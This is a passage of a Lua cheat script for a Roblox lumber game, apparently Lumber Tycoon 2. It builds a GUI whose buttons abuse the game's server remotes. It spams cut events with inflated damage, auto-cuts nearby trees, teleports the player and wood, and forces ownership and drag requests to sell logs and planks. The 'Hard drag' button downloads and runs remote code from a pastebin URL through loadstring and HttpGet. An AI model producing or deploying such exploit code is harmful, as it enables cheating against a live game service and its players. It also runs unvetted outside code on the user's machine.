  1437. if TreeClass ~= "Volcano" then return 0.6 else return 6.35 end
  1438. elseif Axe.ToolTip == "End Times Axe" then
  1439. if TreeClass ~= "LoneCave" then return 1.58 else return 10000000 end
  1440. elseif Axe.ToolTip == "Candy Cane Axe" then return 0
  1441. elseif Axe.ToolTip == "Johiro" then return 1.8
  1442. elseif Axe.ToolTip == "Beesaxe" then return 1.4
  1443. elseif Axe.ToolTip == "CHICKEN AXE" then return 0.9
  1444. elseif Axe.ToolTip == "Amber Axe" then return 3.39
  1445. elseif Axe.ToolTip == "The Many Axe" then return 10.2
  1446. elseif Axe.ToolTip == "Gingerbread Axe" then
  1447. if TreeClass == "Walnut" then return 8.5
  1448. elseif TreeClass == "Koa" then return 11 else return 1.2 end
  1449. elseif Axe.ToolTip == "Bird Axe" then
  1450. if TreeClass == "Volcano" then return 2.5 elseif TreeClass == "CaveCrawler" then return 3.9 else return 1.65 end
  1451. end
  1452. end
  1453.  
  1454.  
  1455. function GCut(TreePart) --Cuts the tree when called with the tree you want to cut
  1456. if GetAxe() ~= false then --checks if you have a axe equiped
  1457. Damage = GetDamage(GetAxe(), TreePart.Parent.TreeClass.Value) --gets the Damage
  1458. Height = TreePart.CFrame:pointToObjectSpace(mouse.Hit.p).Y + TreePart.Size.Y/2 --Gets the Height
  1459. local CutArguments = {
  1460. sectionId = TreePart.ID.Value,
  1461. faceVector = Vector3.new(0,0,-1),
  1462. height = Height,
  1463. hitPoints = Damage,
  1464. cooldown = 0,
  1465. cuttingClass = "Axe",
  1466. tool = GetAxe()
  1467. }
  1468. for i=1, 50 do
  1469. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(TreePart.Parent.CutEvent, CutArguments)
  1470. end
  1471. end
  1472. end
  1473.  
  1474. function CutTree(Tree) --Cuts the tree when called with the tree you want to cut
  1475. if GetAxe() ~= false then --checks if you have a axe equiped
  1476. Damage = GetDamage(GetAxe(), Tree.TreeClass.Value) --gets the Damage
  1477. local CutArguments = {
  1478. sectionId = 1,
  1479. faceVector = Vector3.new(0,0,-1),
  1480. height = 0.5,
  1481. hitPoints = Damage,
  1482. cooldown = 0,
  1483. cuttingClass = "Axe",
  1484. tool = GetAxe()
  1485. }
  1486. for i=1, 50 do
  1487. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(Tree.CutEvent, CutArguments)
  1488. end
  1489. end
  1490. end
  1491.  
  1492. TreeList = {} --Creates a table of the trees
  1493. for a,b in pairs(workspace:GetChildren()) do
  1494. if b.name == "TreeRegion" then
  1495. b.ChildAdded:Connect(function(NewTree)--Creates functions that Adds new trees to the list
  1496. table.insert(TreeList, NewTree)
  1497. end)
  1498. for c,d in pairs(b:GetChildren()) do-- Adds the trees when first time starting the script
  1499. if d.Name == "Model" then
  1500. table.insert(TreeList, d)
  1501. end
  1502. end
  1503. end
  1504. end
  1505.  
  1506. spawn(function() --used spawn so it wont interrupt any of the other things
  1507. CutEnabled = false
  1508. while wait(.5) do --Main loop to do the stuff
  1509. if CutEnabled == true then
  1510. if GetAxe() ~= false then --Checks if you have a axe equiped
  1511. for a,b in pairs(TreeList) do
  1512. if not b:FindFirstChild("RootCut") and b:FindFirstChild("CutEvent") then --Checks if the tree is already cut
  1513. distance = (game.Players.LocalPlayer.Character.Head.Position - b.WoodSection.Position).magnitude --gets the distance between player and tree
  1514. if distance < 225 then --if distance lower than 225 then it will cut the tree
  1515. CutTree(b) --Calls the function with the tree to cut
  1516. end
  1517. else
  1518. table.remove(TreeList, a)--if tree already cut then it gets removed from the list
  1519. end
  1520. end
  1521. end
  1522. end
  1523. end
  1524. end)
  1525.  
  1526. mouse = game.Players.LocalPlayer:GetMouse() --Gets the Mouse
  1527. mouse.Button1Down:connect(function()
  1528. if GAxe == true and GetAxe() ~= false then
  1529. Target = mouse.Target
  1530. GCut(Target)
  1531. end
  1532. end)
  1533. --Credits to Johiro, if you decide to skid atleast give credits
  1534. end)
  1535. Goldaxe.MouseButton1Down:connect(function()
  1536. makesound("rbxassetid://156785206")
  1537. if GAxe == true then
  1538. GAxe = false
  1539. Goldaxe.Text = "Gold Axe Off"
  1540. Goldaxe.TextColor3 = Color3.new(255, 0, 0)
  1541. elseif GAxe == false then
  1542. GAxe = true
  1543. Goldaxe.Text = "Gold Axe On"
  1544. Goldaxe.TextColor3 = Color3.new(0, 1, 0)
  1545. --Credits to Johiro
  1546. end
  1547. end)
  1548.  
  1549.  
  1550. Harddrag.Name = "Harddrag"
  1551. Harddrag.Parent = WoodFrame
  1552. Harddrag.BackgroundColor3 = Color3.new(0, 0, 0)
  1553. Harddrag.BorderColor3 = Color3.new(0, 0, 0)
  1554. Harddrag.Position = UDim2.new(0, 3, 0, 49)
  1555. Harddrag.Size = UDim2.new(0, 165, 0, 20)
  1556. Harddrag.Font = Enum.Font.Fantasy
  1557. Harddrag.FontSize = Enum.FontSize.Size18
  1558. Harddrag.Text = "Hard drag"
  1559. Harddrag.TextColor3 = Color3.new(255, 0, 0)
  1560. Harddrag.TextSize = 15
  1561. Harddrag.MouseButton1Down:connect(function()
  1562. makesound("rbxassetid://156785206")
  1563. Harddrag.Text = "HARD DRAG ACTIVE"
  1564. Harddrag.TextColor3 = Color3.new(0, 1, 0)
  1565. loadstring(game:HttpGet('https://pastebin.com/raw/uMv85wZZ',true))()
  1566.  
  1567. end)
  1568.  
  1569.  
  1570. SellWood.Name = "SellWood"
  1571. SellWood.Parent = WoodFrame
  1572. SellWood.BackgroundColor3 = Color3.new(0, 0, 0)
  1573. SellWood.BorderColor3 = Color3.new(0, 0, 0)
  1574. SellWood.Position = UDim2.new(0, 3, 0, 72)
  1575. SellWood.Size = UDim2.new(0, 165, 0, 20)
  1576. SellWood.Font = Enum.Font.Fantasy
  1577. SellWood.FontSize = Enum.FontSize.Size18
  1578. SellWood.Text = "Sell Cut Wood"
  1579. SellWood.TextColor3 = Color3.new(255, 0, 0)
  1580. SellWood.TextSize = 15
  1581. SellWood.MouseButton1Down:connect(function()
  1582. makesound("rbxassetid://156785206")
  1583. for _, Log in pairs(workspace.LogModels:GetChildren()) do
  1584. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  1585. if Log.Owner.Value == game.Players.LocalPlayer then
  1586. for i,v in pairs(Log:GetChildren()) do
  1587. if v.Name=="WoodSection" then
  1588. spawn(function()
  1589. for i=1,10 do
  1590. wait()
  1591. v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0)
  1592. end
  1593. end)
  1594. end
  1595. end
  1596. spawn(function()
  1597. for i=1,20 do
  1598. wait()
  1599. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log.WoodSection)
  1600. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Log.WoodSection)
  1601. end
  1602. end)
  1603. end
  1604. end
  1605. end
  1606. end)
  1607.  
  1608.  
  1609. SellPlanks.Name = "SellWood"
  1610. SellPlanks.Parent = WoodFrame
  1611. SellPlanks.BackgroundColor3 = Color3.new(0, 0, 0)
  1612. SellPlanks.BorderColor3 = Color3.new(0, 0, 0)
  1613. SellPlanks.Position = UDim2.new(0, 3, 0, 95)
  1614. SellPlanks.Size = UDim2.new(0, 165, 0, 20)
  1615. SellPlanks.Font = Enum.Font.Fantasy
  1616. SellPlanks.FontSize = Enum.FontSize.Size18
  1617. SellPlanks.Text = "Sell Planks"
  1618. SellPlanks.TextColor3 = Color3.new(255, 0, 0)
  1619. SellPlanks.TextSize = 15
  1620. SellPlanks.MouseButton1Click:Connect(function()
  1621. makesound("rbxassetid://156785206")
  1622. for _, Plank in pairs(game.Workspace.PlayerModels:GetChildren()) do
  1623. if Plank.Name=="Plank" and Plank:findFirstChild("Owner") then
  1624. if Plank.Owner.Value == game.Players.LocalPlayer then
  1625. for i,v in pairs(Plank:GetChildren()) do
  1626. if v.Name=="WoodSection" then
  1627. spawn(function()
  1628. for i=1,10 do
  1629. wait()
  1630. v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0)
  1631. end
  1632. end)
  1633. end
  1634. end
  1635. spawn(function()
  1636. for i=1,20 do
  1637. wait()
  1638. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Plank.WoodSection)
  1639. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Plank.WoodSection)
  1640. end
  1641. end)
  1642. end
  1643. end
  1644. end
  1645. end)
  1646.  
  1647.  
  1648. TPWood.Name = "TPWood"
  1649. TPWood.Parent = WoodFrame
  1650. TPWood.BackgroundColor3 = Color3.new(0, 0, 0)
  1651. TPWood.BorderColor3 = Color3.new(0, 0, 0)
  1652. TPWood.Position = UDim2.new(0, 3, 0, 118)
  1653. TPWood.Size = UDim2.new(0, 165, 0, 20)
  1654. TPWood.Font = Enum.Font.Fantasy
  1655. TPWood.FontSize = Enum.FontSize.Size18
  1656. TPWood.Text = "TP Wood to You"
  1657. TPWood.TextColor3 = Color3.new(255, 0, 0)
  1658. TPWood.TextSize = 15
  1659. TPWood.MouseButton1Click:Connect(function()
  1660. makesound("rbxassetid://156785206")
  1661. for _, Log in pairs(game.Workspace.LogModels:GetChildren()) do
  1662. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  1663. if Log.Owner.Value == game.Players.LocalPlayer then
  1664. Log:MoveTo(game.Players.LocalPlayer.Character.HumanoidRootPart.Position)
  1665. for i=1,20 do
  1666. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log.WoodSection)
  1667. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Log.WoodSection)
  1668. end
  1669. end
  1670. end
  1671. end
  1672. end)
  1673.  
  1674. TpAllPlanks.Name = "TpAllPlanks"
  1675. TpAllPlanks.Parent = WoodFrame
  1676. TpAllPlanks.BackgroundColor3 = Color3.new(0, 0, 0)
  1677. TpAllPlanks.BorderColor3 = Color3.new(0, 0, 0)
  1678. TpAllPlanks.Position = UDim2.new(0, 3, 0, 141)
  1679. TpAllPlanks.Size = UDim2.new(0, 165, 0, 20)
  1680. TpAllPlanks.Font = Enum.Font.Fantasy
  1681. TpAllPlanks.FontSize = Enum.FontSize.Size18
  1682. TpAllPlanks.Text = "TP Planks to You"
  1683. TpAllPlanks.TextColor3 = Color3.new(255, 0, 0)
  1684. TpAllPlanks.TextSize = 15
  1685. TpAllPlanks.MouseButton1Click:Connect(function()
  1686. makesound("rbxassetid://156785206")
  1687. for _, Plank in pairs(game.Workspace.PlayerModels:GetChildren()) do
  1688. if Plank.Name=="Plank" and Plank:findFirstChild("Owner") then
  1689. if Plank.Owner.Value == game.Players.LocalPlayer then
  1690. sendNotice = game.ReplicatedStorage.Notices.SendUserNotice
  1691. sendNotice:Fire("Click where you want ALL the Planks to TP to")
  1692. local ButtonPress
  1693. ButtonPress = game.Players.LocalPlayer:GetMouse().Button1Down:Connect(function()
  1694. Square = game.Players.LocalPlayer:GetMouse().Target
  1695. if (Square.Name == "OriginSquare" or Square.Name == "Square") then
  1696. ButtonPress:Disconnect()
  1697. Plank:MoveTo(Square.Position)
  1698. for i=1,100 do
  1699. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Plank)
  1700. end
  1701. end
  1702. end)
  1703. end
  1704. end
  1705. end
  1706. end)
  1707.  
  1708. Type.Name = "Type"
  1709. Type.Parent = TptreeFrame
  1710. Type.BackgroundColor3 = Color3.new(0, 0, 0)
  1711. Type.BorderSizePixel = 1
  1712. Type.BorderColor3 = Color3.fromRGB(196, 40, 28)
  1713. Type.Position = UDim2.new(0, 0, 0, 0)
  1714. Type.Size = UDim2.new(0, 209, 0, 23)
  1715. Type.Font = Enum.Font.SourceSans
  1716. Type.Text = "Tree Type"
  1717. Type.TextColor3 = Color3.new(255, 0, 0)
  1718. Type.TextSize = 14
  1719.  
  1720. Tptree.Name = "Tptree"
  1721. Tptree.Parent = WoodFrame
  1722. Tptree.BackgroundColor3 = Color3.new(0, 0, 0)
  1723. Tptree.BorderColor3 = Color3.new(0, 0, 0)
  1724. Tptree.Position = UDim2.new(0, 3, 0, 164)
  1725. Tptree.Size = UDim2.new(0, 165, 0, 20)
  1726. Tptree.Font = Enum.Font.Fantasy
  1727. Tptree.FontSize = Enum.FontSize.Size18
  1728. Tptree.Text = "Port To Trees"
  1729. Tptree.TextColor3 = Color3.new(255, 0, 0)
  1730. Tptree.TextSize = 15
  1731. Tptree.MouseButton1Click:Connect(function()
  1732. makesound("rbxassetid://156785206")
  1733. end)
  1734.  
  1735. TptreeFrame.Name = "TptreeFrame"
  1736. TptreeFrame.Parent = MenuFrame
  1737. TptreeFrame.BorderSizePixel = 1
  1738. TptreeFrame.BackgroundTransparency = 1
  1739. TptreeFrame.BorderColor3 = Color3.new(0, 0, 0)
  1740. TptreeFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  1741. TptreeFrame.Size = UDim2.new(0, 170, 0, 210)
  1742. TptreeFrame.Visible = false
  1743.  
  1744. BirchTree.Name = "BirchTree"
  1745. BirchTree.Parent = TptreeFrame
  1746. BirchTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1747. BirchTree.BackgroundTransparency = 0
  1748. BirchTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1749. BirchTree.Position = UDim2.new(0, 0, 0, 26)
  1750. BirchTree.Size = UDim2.new(0, 50, 0, 50)
  1751. BirchTree.Image = "rbxassetid://4053569393"
  1752.  
  1753. CavecrawlerTree.Name = "CavecrawlerTree"
  1754. CavecrawlerTree.Parent = TptreeFrame
  1755. CavecrawlerTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1756. CavecrawlerTree.BackgroundTransparency = 0
  1757. CavecrawlerTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1758. CavecrawlerTree.Position = UDim2.new(0, 53, 0, 26)
  1759. CavecrawlerTree.Size = UDim2.new(0, 50, 0, 50)
  1760. CavecrawlerTree.Image = "rbxassetid://4053567003"
  1761. CavecrawlerTree.MouseButton1Click:Connect(function()
  1762. makesound("rbxassetid://156785206")
  1763. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Cave"])
  1764. Type.Text = "Cavecrawler Tree"
  1765. end)
  1766.  
  1767. CherryTree.Name = "CherryTree"
  1768. CherryTree.Parent = TptreeFrame
  1769. CherryTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1770. CherryTree.BackgroundTransparency = 0
  1771. CherryTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1772. CherryTree.Position = UDim2.new(0, 106, 0, 26)
  1773. CherryTree.Size = UDim2.new(0, 50, 0, 50)
  1774. CherryTree.Image = "rbxassetid://4053570076"
  1775.  
  1776. ElmTree.Name = "ElmTree"
  1777. ElmTree.Parent = TptreeFrame
  1778. ElmTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1779. ElmTree.BackgroundTransparency = 0
  1780. ElmTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1781. ElmTree.Position = UDim2.new(0, 159, 0, 26)
  1782. ElmTree.Size = UDim2.new(0, 50, 0, 50)
  1783. ElmTree.Image = "rbxassetid://4053570665"
  1784.  
  1785. Frosttree.Name = "Frosttree"
  1786. Frosttree.Parent = TptreeFrame
  1787. Frosttree.BackgroundColor3 = Color3.new(1, 1, 1)
  1788. Frosttree.BackgroundTransparency = 0
  1789. Frosttree.BorderColor3 = Color3.new(0.6, 0, 0)
  1790. Frosttree.Position = UDim2.new(0, 0, 0, 79)
  1791. Frosttree.Size = UDim2.new(0, 50, 0, 50)
  1792. Frosttree.Image = "rbxassetid://4053571917"
  1793.  
  1794. GenericTree.Name = "GenericTree"
  1795. GenericTree.Parent = TptreeFrame
  1796. GenericTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1797. GenericTree.BackgroundTransparency = 0
  1798. GenericTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1799. GenericTree.Position = UDim2.new(0, 53, 0, 79)
  1800. GenericTree.Size = UDim2.new(0, 50, 0, 50)
  1801. GenericTree.Image = "rbxassetid://4053574105"
  1802.  
  1803. ZombieTree.Name = "ZombieTree"
  1804. ZombieTree.Parent = TptreeFrame
  1805. ZombieTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1806. ZombieTree.BackgroundTransparency = 0
  1807. ZombieTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1808. ZombieTree.Position = UDim2.new(0, 106, 0, 79)
  1809. ZombieTree.Size = UDim2.new(0, 50, 0, 50)
  1810. ZombieTree.Image = "rbxassetid://4053578037"
  1811.  
  1812. GoldTree.Name = "GoldTree"
  1813. GoldTree.Parent = TptreeFrame
  1814. GoldTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1815. GoldTree.BackgroundTransparency = 0
  1816. GoldTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1817. GoldTree.Position = UDim2.new(0, 159, 0, 79)
  1818. GoldTree.Size = UDim2.new(0, 50, 0, 50)
  1819. GoldTree.Image = "rbxassetid://4053572372"
  1820. GoldTree.MouseButton1Click:Connect(function()
  1821. makesound("rbxassetid://156785206")
  1822. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Swamp"])
  1823. Type.Text = "Gold Tree"
  1824. end)
  1825.  
  1826.  
  1827. LavaTree.Name = "LavaTree"
  1828. LavaTree.Parent = TptreeFrame
  1829. LavaTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1830. LavaTree.BackgroundTransparency = 0
  1831. LavaTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1832. LavaTree.Position = UDim2.new(0, 0, 0, 132)
  1833. LavaTree.Size = UDim2.new(0, 50, 0, 50)
  1834. LavaTree.Image = "rbxassetid://4053573529"
  1835.  
  1836. PalmTree.Name = "PalmTree"
  1837. PalmTree.Parent = TptreeFrame
  1838. PalmTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1839. PalmTree.BackgroundTransparency = 0
  1840. PalmTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1841. PalmTree.Position = UDim2.new(0, 53, 0, 132)
  1842. PalmTree.Size = UDim2.new(0, 50, 0, 50)
  1843. PalmTree.Image = "rbxassetid://4053574535"
  1844.  
  1845. PhantomTree.Name = "PhantomTree"
  1846. PhantomTree.Parent = TptreeFrame
  1847. PhantomTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1848. PhantomTree.BackgroundTransparency = 0
  1849. PhantomTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1850. PhantomTree.Position = UDim2.new(0, 106, 0, 132)
  1851. PhantomTree.Size = UDim2.new(0, 50, 0, 50)
  1852. PhantomTree.Image = "rbxassetid://4053575065"
  1853.  
  1854. PineTree.Name = "PineTree"
  1855. PineTree.Parent = TptreeFrame
  1856. PineTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1857. PineTree.BackgroundTransparency = 0
  1858. PineTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1859. PineTree.Position = UDim2.new(0, 159, 0, 132)
  1860. PineTree.Size = UDim2.new(0, 50, 0, 50)
  1861. PineTree.Image = "rbxassetid://4053575551"
  1862.  
  1863. FirTree.Name = "FirTree"
  1864. FirTree.Parent = TptreeFrame
  1865. FirTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1866. FirTree.BackgroundTransparency = 0
  1867. FirTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1868. FirTree.Position = UDim2.new(0, 0, 0, 185)
  1869. FirTree.Size = UDim2.new(0, 50, 0, 50)
  1870. FirTree.Image = "rbxassetid://4053571273"
  1871.  
  1872. Snowglowtree.Name = "Snowglowtree"
  1873. Snowglowtree.Parent = TptreeFrame
  1874. Snowglowtree.BackgroundColor3 = Color3.new(1, 1, 1)
  1875. Snowglowtree.BackgroundTransparency = 0
  1876. Snowglowtree.BorderColor3 = Color3.new(0.6, 0, 0)
  1877. Snowglowtree.Position = UDim2.new(0, 53, 0, 185)
  1878. Snowglowtree.Size = UDim2.new(0, 50, 0, 50)
  1879. Snowglowtree.Image = "rbxassetid://4053576507"
  1880. Snowglowtree.MouseButton1Click:Connect(function()
  1881. makesound("rbxassetid://156785206")
  1882. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1883. uTorso.CFrame = WayPoints["SnowGlow Tree"]
  1884. Type.Text = "Snowglow Tree"
  1885. end)
  1886.  
  1887. Spooktree.Name = "Spooktree"
  1888. Spooktree.Parent = TptreeFrame
  1889. Spooktree.BackgroundColor3 = Color3.new(1, 1, 1)
  1890. Spooktree.BackgroundTransparency = 0
  1891. Spooktree.BorderColor3 = Color3.new(0.6, 0, 0)
  1892. Spooktree.Position = UDim2.new(0, 106, 0, 185)
  1893. Spooktree.Size = UDim2.new(0, 50, 0, 50)
  1894. Spooktree.Image = "rbxassetid://4053576987"
  1895.  
  1896.  
  1897. WalnutTree.Name = "WalnutTree"
  1898. WalnutTree.Parent = TptreeFrame
  1899. WalnutTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1900. WalnutTree.BackgroundTransparency = 0
  1901. WalnutTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1902. WalnutTree.Position = UDim2.new(0, 159, 0, 185)
  1903. WalnutTree.Size = UDim2.new(0, 50, 0, 50)
  1904. WalnutTree.Image = "rbxassetid://4053577500"
  1905.  
  1906. KoaTree.Name = "KoaTree"
  1907. KoaTree.Parent = TptreeFrame
  1908. KoaTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1909. KoaTree.BackgroundTransparency = 0
  1910. KoaTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1911. KoaTree.Position = UDim2.new(0, 53, 0, 238)
  1912. KoaTree.Size = UDim2.new(0, 50, 0, 50)
  1913. KoaTree.Image = "rbxassetid://4053573002"
  1914.  
  1915. SinisterGlow.Name = "SinisterGlow"
  1916. SinisterGlow.Parent = TptreeFrame
  1917. SinisterGlow.BackgroundColor3 = Color3.new(1, 1, 1)
  1918. SinisterGlow.BackgroundTransparency = 0
  1919. SinisterGlow.BorderColor3 = Color3.new(0.6, 0, 0)
  1920. SinisterGlow.Position = UDim2.new(0, 106, 0, 238)
  1921. SinisterGlow.Size = UDim2.new(0, 50, 0, 50)
  1922. SinisterGlow.Image = "rbxassetid://4053576051"
  1923.  
  1924. BirchTree.MouseButton1Click:Connect(function()
  1925. makesound("rbxassetid://156785206")
  1926. for i, v in pairs(game.Workspace:GetChildren()) do
  1927. if v.Name == "TreeRegion" then
  1928. for j, k in ipairs(v:GetChildren()) do
  1929. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Birch" then
  1930. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  1931. break
  1932. end
  1933. end
  1934. end
  1935. end
  1936. Type.Text = "Birch Tree"
  1937. end)
  1938.  
  1939.  
  1940. CherryTree.MouseButton1Click:Connect(function()
  1941. makesound("rbxassetid://156785206")
  1942. for i, v in pairs(game.Workspace:GetChildren()) do
  1943. if v.Name == "TreeRegion" then
  1944. for j, k in ipairs(v:GetChildren()) do
  1945. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Cherry" then
  1946. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  1947. break
  1948. end
  1949. end
  1950. end
  1951. end
  1952. Type.Text = "Cherry Tree"
  1953. end)
  1954.  
  1955. ElmTree.MouseButton1Click:Connect(function()
  1956. makesound("rbxassetid://156785206")
  1957. for i, v in pairs(game.Workspace:GetChildren()) do
  1958. if v.Name == "TreeRegion" then
  1959. for j, k in ipairs(v:GetChildren()) do
  1960. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Oak" then
  1961. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  1962. break
  1963. end
  1964. end
  1965. end
  1966. end
  1967. Type.Text = "ElmTree"
  1968. end)
  1969.  
  1970. FirTree.MouseButton1Click:Connect(function()
  1971. makesound("rbxassetid://156785206")
  1972. for i, v in pairs(game.Workspace:GetChildren()) do
  1973. if v.Name == "TreeRegion" then
  1974. for j, k in ipairs(v:GetChildren()) do
  1975. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Fir" then
  1976. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  1977. break
  1978. end
  1979. end
  1980. end
  1981. end
  1982. Type.Text = "Fir Tree"
  1983. end)
  1984.  
  1985. Frosttree.MouseButton1Click:Connect(function()
  1986. makesound("rbxassetid://156785206")
  1987. for i, v in pairs(game.Workspace:GetChildren()) do
  1988. if v.Name == "TreeRegion" then
  1989. for j, k in ipairs(v:GetChildren()) do
  1990. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Frost" then
  1991. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  1992. break
  1993. end
  1994. end
  1995. end
  1996. end
  1997. Type.Text = "Frost Tree"
  1998. end)
  1999.  
  2000. GenericTree.MouseButton1Click:Connect(function()
  2001. makesound("rbxassetid://156785206")
  2002. for i, v in pairs(game.Workspace:GetChildren()) do
  2003. if v.Name == "TreeRegion" then
  2004. for j, k in ipairs(v:GetChildren()) do
  2005. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Generic" then
  2006. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2007. break
  2008. end
  2009. end
  2010. end
  2011. end
  2012. Type.Text = "Generic Tree"
  2013. end)
  2014.  
  2015.  
  2016. KoaTree.MouseButton1Click:Connect(function()
  2017. makesound("rbxassetid://156785206")
  2018. for i, v in pairs(game.Workspace:GetChildren()) do
  2019. if v.Name == "TreeRegion" then
  2020. for j, k in ipairs(v:GetChildren()) do
  2021. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Koa" then
  2022. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2023. break
  2024. end
  2025. end
  2026. end
  2027. end
  2028. Type.Text = "Koa Tree"
  2029. end)
  2030.  
  2031. LavaTree.MouseButton1Click:Connect(function()
  2032. makesound("rbxassetid://156785206")
  2033. for i, v in pairs(game.Workspace:GetChildren()) do
  2034. if v.Name == "TreeRegion" then
  2035. for j, k in ipairs(v:GetChildren()) do
  2036. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Volcano" then
  2037. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2038. break
  2039. end
  2040. end
  2041. end
  2042. end
  2043. Type.Text = "Lava Tree"
  2044. end)
  2045.  
  2046. PalmTree.MouseButton1Click:Connect(function()
  2047. makesound("rbxassetid://156785206")
  2048. for i, v in pairs(game.Workspace:GetChildren()) do
  2049. if v.Name == "TreeRegion" then
  2050. for j, k in ipairs(v:GetChildren()) do
  2051. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Palm" then
  2052. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2053. break
  2054. end
  2055. end
  2056. end
  2057. end
  2058. Type.Text = "Palm Tree"
  2059. end)
  2060.  
  2061. PhantomTree.MouseButton1Click:Connect(function()
  2062. makesound("rbxassetid://156785206")
  2063. for i, v in pairs(game.Workspace:GetChildren()) do
  2064. if v.Name == "TreeRegion" then
  2065. for j, k in ipairs(v:GetChildren()) do
  2066. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "LoneCave" then
  2067. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2068. break
  2069. end
  2070. end
  2071. end
  2072. end
  2073. Type.Text = "Phantom Tree"
  2074. end)
  2075.  
  2076. PineTree.MouseButton1Click:Connect(function()
  2077. makesound("rbxassetid://156785206")
  2078. for i, v in pairs(game.Workspace:GetChildren()) do
  2079. if v.Name == "TreeRegion" then
  2080. for j, k in ipairs(v:GetChildren()) do
  2081. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Pine" then
  2082. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2083. break
  2084. end
  2085. end
  2086. end
  2087. end
  2088. Type.Text = "Pine Tree"
  2089. end)
  2090.  
  2091. SinisterGlow.MouseButton1Click:Connect(function()
  2092. makesound("rbxassetid://156785206")
  2093. for i, v in pairs(game.Workspace:GetChildren()) do
  2094. if v.Name == "TreeRegion" then
  2095. for j, k in ipairs(v:GetChildren()) do
  2096. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "SpookyNeon" then
  2097. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2098. break
  2099. end
  2100. end
  2101. end
  2102. end
  2103. Type.Text = "Sinister Tree"
  2104. end)
  2105.  
  2106.  
  2107. Spooktree.MouseButton1Click:Connect(function()
  2108. makesound("rbxassetid://156785206")
  2109. for i, v in pairs(game.Workspace:GetChildren()) do
  2110. if v.Name == "TreeRegion" then
  2111. for j, k in ipairs(v:GetChildren()) do
  2112. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Spooky" then
  2113. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2114. break
  2115. end
  2116. end
  2117. end
  2118. end
  2119. Type.Text = "Spook Tree"
  2120. end)
  2121.  
  2122. WalnutTree.MouseButton1Click:Connect(function()
  2123. makesound("rbxassetid://156785206")
  2124. for i, v in pairs(game.Workspace:GetChildren()) do
  2125. if v.Name == "TreeRegion" then
  2126. for j, k in ipairs(v:GetChildren()) do
  2127. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Walnut" then
  2128. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2129. break
  2130. end
  2131. end
  2132. end
  2133. end
  2134. Type.Text = "Walnut Tree"
  2135. end)
  2136.  
  2137. ZombieTree.MouseButton1Click:Connect(function()
  2138. makesound("rbxassetid://156785206")
  2139. for i, v in pairs(game.Workspace:GetChildren()) do
  2140. if v.Name == "TreeRegion" then
